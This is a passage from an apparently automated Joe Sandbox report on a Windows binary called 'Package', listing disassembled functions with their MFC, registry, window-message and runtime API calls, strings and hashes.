Part of subcall function 00D2C962: #861.MFC42U(00D221A0), ref: 00D2C9E8

Part of subcall function 00D39485: __EH_prolog3.LIBCMT ref: 00D3948C
Part of subcall function 00D39485: #326.MFC42U(00000008,00D2D71F,0000007A,00000008,00D2D2DA,00000004), ref: 00D39496
Part of subcall function 00D39485: #567.MFC42U(00000008,00D2D71F,0000007A,00000008,00D2D2DA,00000004), ref: 00D394AD

#567.MFC42U(0000007A,00000008,00D2D2DA,00000004), ref: 00D2D72E
#567.MFC42U(0000007A,00000008,00D2D2DA,00000004), ref: 00D2D748
#567.MFC42U(0000007A,00000008,00D2D2DA,00000004), ref: 00D2D763
#567.MFC42U(0000007A,00000008,00D2D2DA,00000004), ref: 00D2D779
#567.MFC42U(0000007A,00000008,00D2D2DA,00000004), ref: 00D2D78F

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #567$#540H_prolog3$#861$#324$#326#364
String ID:
API String ID: 797904982-0
Opcode ID: cf4894534bc886d04fe8049d8cc0b2fdfa64c7f940beaddbf823b5f16b151063
Instruction ID: ce343b0f95fffad92e8bf0365310784f5d714677b4e52df42722553c72ef3dee
Opcode Fuzzy Hash: cf4894534bc886d04fe8049d8cc0b2fdfa64c7f940beaddbf823b5f16b151063
Instruction Fuzzy Hash: 36210A70A0565AEADB05EFA4C5113EDFBA0BF29304F50414DE48567382DBB82B15DBF2

Function 00D309D5 Relevance: 10.5, APIs: 7, Instructions: 43COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D309DC
#324.MFC42U(00000087,00000000,00000008,00D2D6F2,0000007A,00000008,00D2D2DA,00000004), ref: 00D309ED
#567.MFC42U(00000087,00000000,00000008,00D2D6F2,0000007A,00000008,00D2D2DA,00000004), ref: 00D30A04
#567.MFC42U(00000087,00000000,00000008,00D2D6F2,0000007A,00000008,00D2D2DA,00000004), ref: 00D30A1F
#567.MFC42U(00000087,00000000,00000008,00D2D6F2,0000007A,00000008,00D2D2DA,00000004), ref: 00D30A35
#567.MFC42U(00000087,00000000,00000008,00D2D6F2,0000007A,00000008,00D2D2DA,00000004), ref: 00D30A4B
#567.MFC42U(00000087,00000000,00000008,00D2D6F2,0000007A,00000008,00D2D2DA,00000004), ref: 00D30A61

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #567$#324H_prolog3
String ID:
API String ID: 3217428371-0
Opcode ID: b7251d0b004f2f4e0cf1e2d48ee0c9bd23e34faa939ef0c07d7feec57d95b933
Instruction ID: 895ddd32a9c447004efa2ba362cb3415dea793d6d339dc42359507a2e9b528e5
Opcode Fuzzy Hash: b7251d0b004f2f4e0cf1e2d48ee0c9bd23e34faa939ef0c07d7feec57d95b933
Instruction Fuzzy Hash: 83110671A0136ADBDB059FA485023DCBBA0AF54700F60400DE58077381CBB81B45CBF2

Function 00D2ED46 Relevance: 10.5, APIs: 7, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D2ED50
#498.MFC42U(00000090), ref: 00D2ED5A

Part of subcall function 00D2E941: __EH_prolog3.LIBCMT ref: 00D2E948
Part of subcall function 00D2E941: #489.MFC42U(0000008F,00000000,00000008,00D2E8DA,00000004), ref: 00D2E959
Part of subcall function 00D2E941: #567.MFC42U(0000008F,00000000,00000008,00D2E8DA,00000004), ref: 00D2E973

Part of subcall function 00D2E736: __EH_prolog3.LIBCMT ref: 00D2E73D
Part of subcall function 00D2E736: #489.MFC42U(00000090,00000000,00000008,00D2E6BA,00000004), ref: 00D2E74E
Part of subcall function 00D2E736: #567.MFC42U(00000090,00000000,00000008,00D2E6BA,00000004), ref: 00D2E768

Part of subcall function 00D3B460: __EH_prolog3.LIBCMT ref: 00D3B467
Part of subcall function 00D3B460: #489.MFC42U(0000008D,00000000,00000008,00D2ED96,00000090), ref: 00D3B478
Part of subcall function 00D3B460: #567.MFC42U(0000008D,00000000,00000008,00D2ED96,00000090), ref: 00D3B492
Part of subcall function 00D3B460: #567.MFC42U(0000008D,00000000,00000008,00D2ED96,00000090), ref: 00D3B4AD

#497.MFC42U(00D221A0,?,00000000,00000090), ref: 00D2EDAA
#771.MFC42U(00D221A0,?,00000000,00000090), ref: 00D2EDB5
#1008.MFC42U(?,00D221A0,?,00000000,00000090), ref: 00D2EDBD

Part of subcall function 00D3D4CD: GetVersionExW.KERNEL32(?), ref: 00D3D4F3

#1008.MFC42U(?,?,00D221A0,?,00000000,00000090), ref: 00D2EDCE
#1008.MFC42U(?,?,?,00D221A0,?,00000000,00000090), ref: 00D2EDDC

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #567H_prolog3$#1008#489$#497#498#771Version
String ID:
API String ID: 3371278394-0
Opcode ID: 6ed4bbc7825ce99142c00a871bfe5b825f2ae2e31ded8ab09b3d703973c1c7d8
Instruction ID: 37d2593487a7e539b634eed533fd03da9b4f4812333482d34718ab05b52b4641
Opcode Fuzzy Hash: 6ed4bbc7825ce99142c00a871bfe5b825f2ae2e31ded8ab09b3d703973c1c7d8
Instruction Fuzzy Hash: 78017170E00219ABDB15FBB09896BECFB65EF94304F144059F408673C2CF746A08DAB1

Function 00D35F0E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42registryCOMMON

Download Yara Rule

APIs

RegOpenKeyW.ADVAPI32(80000000,CLSID,?), ref: 00D35F63
RegEnumKeyW.ADVAPI32(?,00000000,?,00000040), ref: 00D35F9C
wsprintfW.USER32 ref: 00D35FD4
RegOpenKeyW.ADVAPI32(?,?,?), ref: 00D35FF1
RegCloseKey.ADVAPI32(?), ref: 00D36006
RegQueryValueW.ADVAPI32(?,?,?,00000100), ref: 00D36202
wsprintfW.USER32 ref: 00D36231
#1083.MFC42U(?), ref: 00D362E2
RegCloseKey.ADVAPI32(?), ref: 00D36377

Strings

%s\Implemented Categories\%s, xrefs: 00D35FC8
CLSID, xrefs: 00D35F59

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: CloseOpenwsprintf$#1083EnumQueryValue
String ID: %s\Implemented Categories\%s$CLSID
API String ID: 2375140502-1315529758
Opcode ID: da28e54e90c36cf16f8b0fc81d76bc52f82c4645aa4079baf03b09ebcb495773
Instruction ID: 1ccd08e7584e2c16a52af2284b8c6629a40b570eb56f6277eea8066cef89946a
Opcode Fuzzy Hash: da28e54e90c36cf16f8b0fc81d76bc52f82c4645aa4079baf03b09ebcb495773
Instruction Fuzzy Hash: A611C571D08628AFEB21DB61DC44BA9B7BCFB18345F0480D9A50EE1150D779AB989F60

Function 00D37CEB Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 41registryCOMMON

Download Yara Rule

APIs

RegQueryValueW.ADVAPI32(00000000,ToolboxBitmap32,?,00000208), ref: 00D37E9A
RegQueryValueW.ADVAPI32(00000000,ToolboxBitmap,?,00000208), ref: 00D37EBD
#861.MFC42U(?), ref: 00D37EDA
RegCloseKey.ADVAPI32(00000000,?), ref: 00D37EEE

Strings

ToolboxBitmap32, xrefs: 00D37E8F
ToolboxBitmap, xrefs: 00D37EB2

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: QueryValue$#861Close
String ID: ToolboxBitmap$ToolboxBitmap32
API String ID: 1198224557-4222126835
Opcode ID: 0cb7212a38a5c3896d040803321f92cfd8244c54b4c37255f8dfddd8f853f31b
Instruction ID: e112682a4cc2710f99e5744b49723494f3b2a3161d54a73c8ee62d58b58f2045
Opcode Fuzzy Hash: 0cb7212a38a5c3896d040803321f92cfd8244c54b4c37255f8dfddd8f853f31b
Instruction Fuzzy Hash: FF011BB694021D9FCB60DF10DC89BD973B8BF24305F0001E5A11AE2291DA709E84CF30

Function 00D37C94 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 41registryCOMMON

Download Yara Rule

APIs

RegQueryValueW.ADVAPI32(00000000,ToolboxBitmap32,?,00000208), ref: 00D37E9A
RegQueryValueW.ADVAPI32(00000000,ToolboxBitmap,?,00000208), ref: 00D37EBD
#861.MFC42U(?), ref: 00D37EDA
RegCloseKey.ADVAPI32(00000000,?), ref: 00D37EEE

Strings

ToolboxBitmap32, xrefs: 00D37E8F
ToolboxBitmap, xrefs: 00D37EB2

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: QueryValue$#861Close
String ID: ToolboxBitmap$ToolboxBitmap32
API String ID: 1198224557-4222126835
Opcode ID: bba1733d658b2f862231fe1460e83ba357e7538813688ce8dd2dad1f2cd17332
Instruction ID: e112682a4cc2710f99e5744b49723494f3b2a3161d54a73c8ee62d58b58f2045
Opcode Fuzzy Hash: bba1733d658b2f862231fe1460e83ba357e7538813688ce8dd2dad1f2cd17332
Instruction Fuzzy Hash: FF011BB694021D9FCB60DF10DC89BD973B8BF24305F0001E5A11AE2291DA709E84CF30

Function 00D37DF6 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 41registryCOMMON

Download Yara Rule

APIs

RegQueryValueW.ADVAPI32(00000000,ToolboxBitmap32,?,00000208), ref: 00D37E9A
RegQueryValueW.ADVAPI32(00000000,ToolboxBitmap,?,00000208), ref: 00D37EBD
#861.MFC42U(?), ref: 00D37EDA
RegCloseKey.ADVAPI32(00000000,?), ref: 00D37EEE

Strings

ToolboxBitmap32, xrefs: 00D37E8F
ToolboxBitmap, xrefs: 00D37EB2

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: QueryValue$#861Close
String ID: ToolboxBitmap$ToolboxBitmap32
API String ID: 1198224557-4222126835
Opcode ID: 219555578d4d0414cbaff31705040aa4f9b7b7b846abecd419c8832937797eef
Instruction ID: e112682a4cc2710f99e5744b49723494f3b2a3161d54a73c8ee62d58b58f2045
Opcode Fuzzy Hash: 219555578d4d0414cbaff31705040aa4f9b7b7b846abecd419c8832937797eef
Instruction Fuzzy Hash: FF011BB694021D9FCB60DF10DC89BD973B8BF24305F0001E5A11AE2291DA709E84CF30

Function 00D37D42 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 41registryCOMMON

Download Yara Rule

APIs

RegQueryValueW.ADVAPI32(00000000,ToolboxBitmap32,?,00000208), ref: 00D37E9A
RegQueryValueW.ADVAPI32(00000000,ToolboxBitmap,?,00000208), ref: 00D37EBD
#861.MFC42U(?), ref: 00D37EDA
RegCloseKey.ADVAPI32(00000000,?), ref: 00D37EEE

Strings

ToolboxBitmap32, xrefs: 00D37E8F
ToolboxBitmap, xrefs: 00D37EB2

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: QueryValue$#861Close
String ID: ToolboxBitmap$ToolboxBitmap32
API String ID: 1198224557-4222126835
Opcode ID: fe9c38ab84a81da08a3c3959564f00052fd5b74c6f514e1177e4adf00036edda
Instruction ID: e112682a4cc2710f99e5744b49723494f3b2a3161d54a73c8ee62d58b58f2045
Opcode Fuzzy Hash: fe9c38ab84a81da08a3c3959564f00052fd5b74c6f514e1177e4adf00036edda
Instruction Fuzzy Hash: FF011BB694021D9FCB60DF10DC89BD973B8BF24305F0001E5A11AE2291DA709E84CF30

Function 00D2C800 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 37windowCOMMON

Download Yara Rule

APIs

#4704.MFC42U ref: 00D2C80D
SendMessageW.USER32(?,00001061,00000000,?), ref: 00D2C838
SendMessageW.USER32(?,00001061,00000001,?), ref: 00D2C85C

Strings

j, xrefs: 00D2C855
User/Group, xrefs: 00D2C823
Can Access, xrefs: 00D2C84E

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: MessageSend$#4704
String ID: Can Access$User/Group$j
API String ID: 2927661609-2049629346
Opcode ID: c43f55d92c040860019ab13a19a718f18a42431e258fa40cd8b67f57ee2f8a4a
Instruction ID: c06b6a902e6f538506334dc86e73eec5f57bea859fac7fcf96bf0d24918d48ec
Opcode Fuzzy Hash: c43f55d92c040860019ab13a19a718f18a42431e258fa40cd8b67f57ee2f8a4a
Instruction Fuzzy Hash: CDF04F75900318AFEF109F95DC49FEFBBB9EB86714F10041AE901B6380C3B659458AB5

Function 00D2C962 Relevance: 10.5, APIs: 7, Instructions: 36COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D2C969
#324.MFC42U(00000085,00000000,00000008,00D2C91A,00000004), ref: 00D2C97A
#567.MFC42U(00000085,00000000,00000008,00D2C91A,00000004), ref: 00D2C991
#567.MFC42U(00000085,00000000,00000008,00D2C91A,00000004), ref: 00D2C9AB
#540.MFC42U(00000085,00000000,00000008,00D2C91A,00000004), ref: 00D2C9C2
#540.MFC42U(00000085,00000000,00000008,00D2C91A,00000004), ref: 00D2C9D1
#861.MFC42U(00D221A0), ref: 00D2C9E8

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #540#567$#324#861H_prolog3
String ID:
API String ID: 4024192314-0
Opcode ID: cfaa7d447322a4eeecc7de5daf62a4b3ae7f2afcafd12602aecc5be280b03326
Instruction ID: e1bc7b20ced7f65914a23fefc97e111c87f549755917815cdb2b2ed679291a6f
Opcode Fuzzy Hash: cfaa7d447322a4eeecc7de5daf62a4b3ae7f2afcafd12602aecc5be280b03326
Instruction Fuzzy Hash: 8B017171A10657EBDB15EB6085063ADBBA0BF54704F504048E650273C2CBF41B08D7F2

Function 00D393AF Relevance: 10.5, APIs: 7, Instructions: 28COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D393B6
#540.MFC42U(00000004,00D399BF,?,?,?,00000000,00000000), ref: 00D393C9
#540.MFC42U(00000004,00D399BF,?,?,?,00000000,00000000), ref: 00D393D5
#540.MFC42U(00000004,00D399BF,?,?,?,00000000,00000000), ref: 00D393E1
#858.MFC42U(?,00000004,00D399BF,?,?,?,00000000,00000000), ref: 00D393F0
#858.MFC42U(?,?,00000004,00D399BF,?,?,?,00000000,00000000), ref: 00D393FB
#858.MFC42U(?,?,?,00000004,00D399BF,?,?,?,00000000,00000000), ref: 00D39406

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #540#858$H_prolog3
String ID:
API String ID: 3210275551-0
Opcode ID: a1563ae13f566db38f11f540e6110c19dadefad6e89bb2d2cfcadbbde6770b0f
Instruction ID: 804092f9e721154ec87d40949ba23ea96faa2b49a8308f189703d769a23a5fe8
Opcode Fuzzy Hash: a1563ae13f566db38f11f540e6110c19dadefad6e89bb2d2cfcadbbde6770b0f
Instruction Fuzzy Hash: D2F0FF71500649DBCB14EF60D451B9EBBB2FF20715F00845CF5DA2A252DBB0AA18DB71

Function 00D39419 Relevance: 10.5, APIs: 7, Instructions: 28COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D39420
#540.MFC42U(00000004,00D3B222,?,?,TypeLib,?), ref: 00D39433
#540.MFC42U(00000004,00D3B222,?,?,TypeLib,?), ref: 00D3943F
#540.MFC42U(00000004,00D3B222,?,?,TypeLib,?), ref: 00D3944B
#858.MFC42U(?,00000004,00D3B222,?,?,TypeLib,?), ref: 00D3945A
#861.MFC42U(00D221A0,?,00000004,00D3B222,?,?,TypeLib,?), ref: 00D39467
#858.MFC42U(?,00D221A0,?,00000004,00D3B222,?,?,TypeLib,?), ref: 00D39472

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #540$#858$#861H_prolog3
String ID:
API String ID: 117671327-0
Opcode ID: a880bb6b05714a34d387ac31c8b0b0c004f0a0d5f92d670d991af4d9b78b6cb2
Instruction ID: c7162c78e927a5c8b98c8229d81bf134e4545d5da469fbdfd26e07957b00071b
Opcode Fuzzy Hash: a880bb6b05714a34d387ac31c8b0b0c004f0a0d5f92d670d991af4d9b78b6cb2
Instruction Fuzzy Hash: BEF0FF715006159BCB14EB60D452B99BBA1EF24715F00845CB5DA2A292DBB0AA18DB71

Function 00D32AC0 Relevance: 9.1, APIs: 6, Instructions: 108COMMON

Download Yara Rule

APIs

#1662.MFC42U ref: 00D32B02
#5596.MFC42U ref: 00D32B2D
#5596.MFC42U ref: 00D32B45
#861.MFC42U(00D221A0,00000000,0000000D), ref: 00D32BB6
#6325.MFC42U(00000000,00000004,00000000,00D221A0,00000000,0000000D), ref: 00D32BC4
#2644.MFC42U ref: 00D32C14

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #5596$#1662#2644#6325#861
String ID:
API String ID: 4171677465-0
Opcode ID: 92d75334ca20d28c49a398d941eae355681f23a10bf4b6d214b1d77fae5b56bd
Instruction ID: 86993fccfc35953b13f9d0d8d3e2d83fddbedf2f779d0ac6d726f2f84c489e4b
Opcode Fuzzy Hash: 92d75334ca20d28c49a398d941eae355681f23a10bf4b6d214b1d77fae5b56bd
Instruction Fuzzy Hash: 6341CF74A01244EFDB54EFA4D956BADB7B1EF85314F104068E502AB3A2CB709E40CF71

Function 00D38F95 Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

#1662.MFC42U ref: 00D38FAE
#5596.MFC42U ref: 00D38FD9
#5596.MFC42U ref: 00D38FF1
#861.MFC42U(00D221A0), ref: 00D39062
#6325.MFC42U(00000000,00000004,00000000,00D221A0), ref: 00D39070
#2644.MFC42U ref: 00D390C0

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #5596$#1662#2644#6325#861
String ID:
API String ID: 4171677465-0
Opcode ID: 13d29a55c613bcf84f7cb871f450e58d5fa56a9f712ddb453e5388e52d2dcc62
Instruction ID: 41069cfdac115f3becdec474e6b21169988fa09fa2ba48b398b8089da477b68c
Opcode Fuzzy Hash: 13d29a55c613bcf84f7cb871f450e58d5fa56a9f712ddb453e5388e52d2dcc62
Instruction Fuzzy Hash: F7319C74A01645AFCB54FFA8D966BADB7B1EF85304F104164E502AB3A2DB70AE00DF71

Function 00D2E583 Relevance: 9.1, APIs: 6, Instructions: 72COMMON

Download Yara Rule

APIs

#6211.MFC42U(?,0000130B,?,?,00D2D5AA,00000000), ref: 00D2E5BE
#6211.MFC42U(?,0000130B,?,?,00D2D5AA,00000000), ref: 00D2E5E8
#6211.MFC42U(?,0000130B,?,?,00D2D5AA,00000000), ref: 00D2E60B
#6211.MFC42U(?,0000130B,?,?,00D2D5AA,00000000), ref: 00D2E62E
#6211.MFC42U(?,0000130B,?,?,00D2D5AA,00000000), ref: 00D2E651
RedrawWindow.USER32(?,00000000,00000000,00000105,?,0000130B,?,?,00D2D5AA,00000000), ref: 00D2E669

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #6211$RedrawWindow
String ID:
API String ID: 4151937776-0
Opcode ID: c0cc7807b7885a534d4025d0eb20e68f4abd6c094d8b78e6b300cb49b7644123
Instruction ID: 3415ab75a94875909313d567f60c2c80a4508f85f63a355f10cad3d5db22b0fc
Opcode Fuzzy Hash: c0cc7807b7885a534d4025d0eb20e68f4abd6c094d8b78e6b300cb49b7644123
Instruction Fuzzy Hash: B1218E30010615BACF358E26EC08ED77B79EBB672AF05C92DF46A540A0D6759A44DF70

Function 00D3CD41 Relevance: 9.1, APIs: 6, Instructions: 66COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00D3CD5F
free.MSVCRT ref: 00D3CD71
free.MSVCRT ref: 00D3CD83
free.MSVCRT ref: 00D3CD95
InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,00000000,?,00D3CE02,00000000,00000000,00000000), ref: 00D3CDB7
GetLastError.KERNEL32(00000000), ref: 00D3CDC2

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: free$DescriptorErrorInitializeLastSecurity
String ID:
API String ID: 1417453991-0
Opcode ID: 266d13bf33fb7e24e48e761a9a57f46bfa46868f07766eb5baf1190ea15f0765
Instruction ID: 8defa3f5c7058d0b0b2459ee5b6332780b8d6131bdf9520e01fbf84f872d3479
Opcode Fuzzy Hash: 266d13bf33fb7e24e48e761a9a57f46bfa46868f07766eb5baf1190ea15f0765
Instruction Fuzzy Hash: 56117F36514B02CFC7305F65FC44652BBE1EF41321B2AA83EF1D6E6560CB348880CBA0

Function 00D2D944 Relevance: 9.1, APIs: 6, Instructions: 64stringregistrywindowCOMMON

Download Yara Rule

APIs

RegQueryValueW.ADVAPI32(?,?,?,?), ref: 00D2D979
lstrlenW.KERNEL32(?), ref: 00D2D98A
lstrcpyW.KERNEL32(?,?), ref: 00D2D9C1
wcsrchr.MSVCRT ref: 00D2D9CF
#1165.MFC42U ref: 00D2D9E0
ExtractIconW.SHELL32(?,?,00000000), ref: 00D2D9F2

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #1165ExtractIconQueryValuelstrcpylstrlenwcsrchr
String ID:
API String ID: 2919050075-0
Opcode ID: 83648ae63144c5ea2a3d4e5008631e80b6202848191d78570de432fa1e3061da
Instruction ID: c2ba20d5fd2103fede44b384ccb416d7d8d29ac2626e62d80436f29ebb1b1a9d
Opcode Fuzzy Hash: 83648ae63144c5ea2a3d4e5008631e80b6202848191d78570de432fa1e3061da
Instruction Fuzzy Hash: 3A218E769003189BCB20EF64EC49ADA77BDEF19314F104599F519D7191DB709A84CF70

Function 6E2F235C Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00000001,?,6E2F1E31,6E2F163B,6E2F104E,?,6E2F1286,?,00000001,?,?,00000001,?,6E304520,0000000C,6E2F137F), ref: 6E2F236A
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E2F2378
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E2F2391
